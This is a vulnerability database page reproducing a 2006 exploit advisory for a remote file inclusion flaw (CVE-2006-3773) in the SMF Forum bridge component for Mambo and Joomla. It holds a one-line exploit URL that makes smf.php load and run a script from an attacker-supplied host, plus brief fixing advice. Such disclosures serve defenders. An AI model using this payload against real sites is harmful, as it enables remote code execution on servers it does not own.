Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion

Related Vulnerabilities: CVE-2006-3773  
Publish Date: 17 Jul 2006
Author: ASIANEAGLE
Source / Download Exploit 
                							

                **********************************************************
Joomla-SMF Forum Bridge For Mambo 4.5.3+ And Mambo 4.5.3+ 
        Remote File Inclusion Vulnebrality
**********************************************************
Discovered by : ASIANEAGLE 
Remote:Yes
Level:High
---------------------------------------------------------
Application: SMF Forum 1.3.1.3 Bridge Component For Joomla And Mambo
Vulnerable File: smf.php

----------------------------------------------------------------
Exploit: http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]
----------------------------------------------------------------------------------------------------------------------

Fixing:

1.Declare variabel $mosConfig_absolute_path or;


2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

-----------------------------------------------------------------------------------------------------------------------
Contact:
mail: asianeagle@linuxmail.org
website:http://asianeagle.to.md/

Greetz to: Muhacir, Turkmenux and All Turkish AND Turkmen Hackers

*****ASIANEAGLE SECURITY*****

# milw0rm.com [2006-07-17]

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started